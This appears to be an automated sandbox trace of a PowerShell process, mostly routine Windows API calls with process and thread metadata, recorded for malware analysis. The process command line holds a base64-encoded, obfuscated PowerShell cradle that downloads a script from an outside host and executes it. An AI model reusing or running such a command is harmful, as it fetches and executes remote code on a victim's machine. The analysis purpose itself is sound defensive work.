	[0948.416] CheckTokenMembership (in: TokenHandle=0x2fc, SidToCheck=0x2dfe230*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd748 | out: IsMember=0xcd748) returned 1
	[0948.416] CloseHandle (hObject=0x2fc) returned 1
	[0948.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0948.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0948.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0948.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0950.859] CoTaskMemAlloc (cb=0x804) returned 0x1b844880
	[0950.859] GetConsoleTitleW (in: lpConsoleTitle=0x1b844880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0953.868] CoTaskMemFree (pv=0x1b844880) 
	[0961.223] CoTaskMemAlloc (cb=0x804) returned 0x1b846130
	[0961.223] GetConsoleTitleW (in: lpConsoleTitle=0x1b846130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0961.224] CoTaskMemFree (pv=0x1b846130) 
	[0961.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.226] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0961.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.175] SetConsoleCtrlHandler (HandlerRoutine=0x2a068dc, Add=1) returned 1
	[0962.499] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0962.501] CoCreateGuid (in: pguid=0xcd830 | out: pguid=0xcd830*(Data1=0x3a94f437, Data2=0xc902, Data3=0x43be, Data4=([0]=0x97, [1]=0xe1, [2]=0xc9, [3]=0x27, [4]=0xc1, [5]=0x77, [6]=0x28, [7]=0xb0))) returned 0x0
	[0964.126] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0964.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.126] CoTaskMemFree (pv=0x15e2f0) 
	[0966.530] WinSqmIsOptedIn () returned 0x0
	[0966.532] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0966.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.532] CoTaskMemFree (pv=0x15e2f0) 
	[0966.537] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0966.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.537] CoTaskMemFree (pv=0x15e2f0) 
	[0967.587] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0967.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.587] CoTaskMemFree (pv=0x15e2f0) 
	[0967.587] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0967.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.588] CoTaskMemFree (pv=0x15e2f0) 
	[0967.588] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0967.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.588] CoTaskMemFree (pv=0x15e2f0) 
	[0968.886] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0968.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.886] CoTaskMemFree (pv=0x15e2f0) 
	[0968.887] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0968.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.887] CoTaskMemFree (pv=0x15e2f0) 
	[0968.887] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0968.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.887] CoTaskMemFree (pv=0x15e2f0) 
	[0968.889] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0968.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.889] CoTaskMemFree (pv=0x15e2f0) 
	[0970.071] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0970.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.071] CoTaskMemFree (pv=0x15e2f0) 
	[0970.075] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0970.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.075] CoTaskMemFree (pv=0x15e2f0) 
	[0970.076] CoTaskMemAlloc (cb=0x104) returned 0x15e2f0
	[0970.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x15e2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.076] CoTaskMemFree (pv=0x15e2f0) 

Thread:
	id = 659
	os_tid = 0x1490


Thread:
	id = 662
	os_tid = 0x14a4


Thread:
	id = 1406
	os_tid = 0x1fe8


Thread:
	id = 1422
	os_tid = 0x18f8


Thread:
	id = 1517
	os_tid = 0x1a20


Thread:
	id = 1652
	os_tid = 0x223c


Thread:
	id = 1653
	os_tid = 0x2294

	[0828.546] CoGetContextToken (in: pToken=0x1b54f650 | out: pToken=0x1b54f650) returned 0x0
	[0828.546] CObjectContext::QueryInterface () returned 0x0
	[0828.547] CObjectContext::GetCurrentThreadType () returned 0x0
	[0828.547] Release () returned 0x0
	[0828.547] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2113
	os_tid = 0x1c30


Process:
	id = "108"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x642eb000"
	os_pid = "0xcb4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 569
	os_tid = 0xc2c

	[0824.707] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0839.370] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0839.371] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0839.371] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0839.371] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0913.227] sprintf_s (in: _DstBuf=0x22f418, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0917.138] GetVersionExW (in: lpVersionInformation=0x22df20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22df20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0917.140] GetVersionExW (in: lpVersionInformation=0x22df20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22df20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0917.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.160] GetVersionExW (in: lpVersionInformation=0x22dc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22dc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0917.161] SetErrorMode (uMode=0x1) returned 0x1
	[0917.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22ddf0 | out: lpFileInformation=0x22ddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0917.163] SetErrorMode (uMode=0x1) returned 0x1
	[0917.599] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e060 | out: lpdwHandle=0x22e060) returned 0x94c
	[0917.602] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e872f0 | out: lpData=0x2e872f0) returned 1
	[0917.607] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22dfd8, puLen=0x22dfd0 | out: lplpBuffer=0x22dfd8*=0x2e8738c, puLen=0x22dfd0) returned 1
	[0917.610] lstrlenW (lpString="䅁") returned 1
	[0917.619] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e87468, puLen=0x22df40) returned 1
	[0917.620] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0917.622] CoTaskMemAlloc (cb=0x2e) returned 0x4e3810
	[0917.622] lstrcpyW (in: lpString1=0x4e3810, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0917.623] CoTaskMemFree (pv=0x4e3810) 
	[0917.623] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e874bc, puLen=0x22df40) returned 1
	[0917.623] lstrlenW (lpString="System.Management.Automation") returned 28
	[0917.623] CoTaskMemAlloc (cb=0x3c) returned 0x490b10
	[0917.623] lstrcpyW (in: lpString1=0x490b10, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0917.623] CoTaskMemFree (pv=0x490b10) 
	[0917.623] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e87518, puLen=0x22df40) returned 1
	[0917.623] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0917.623] CoTaskMemAlloc (cb=0x20) returned 0x4e9790
	[0917.623] lstrcpyW (in: lpString1=0x4e9790, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0917.623] CoTaskMemFree (pv=0x4e9790) 
	[0917.623] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e87558, puLen=0x22df40) returned 1
	[0917.623] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0917.623] CoTaskMemAlloc (cb=0x44) returned 0x490b10
	[0917.623] lstrcpyW (in: lpString1=0x490b10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0917.623] CoTaskMemFree (pv=0x490b10) 
	[0917.623] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e875c0, puLen=0x22df40) returned 1
	[0917.623] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0917.623] CoTaskMemAlloc (cb=0x76) returned 0x485e20
	[0917.624] lstrcpyW (in: lpString1=0x485e20, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0917.624] CoTaskMemFree (pv=0x485e20) 
	[0917.624] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e8765c, puLen=0x22df40) returned 1
	[0917.624] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0917.624] CoTaskMemAlloc (cb=0x44) returned 0x490b10
	[0917.624] lstrcpyW (in: lpString1=0x490b10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0917.624] CoTaskMemFree (pv=0x490b10) 
	[0917.624] VerQueryValueW (in: pBlock=0x2e872f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22df48, puLen=0x22df40 | out: lplpBuffer=0x22df48*=0x2e876c0, puLen=0x22df40) returned 1
	[0917.624] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0917.624] CoTaskMemAlloc (cb=0x58) returned 0x434f40
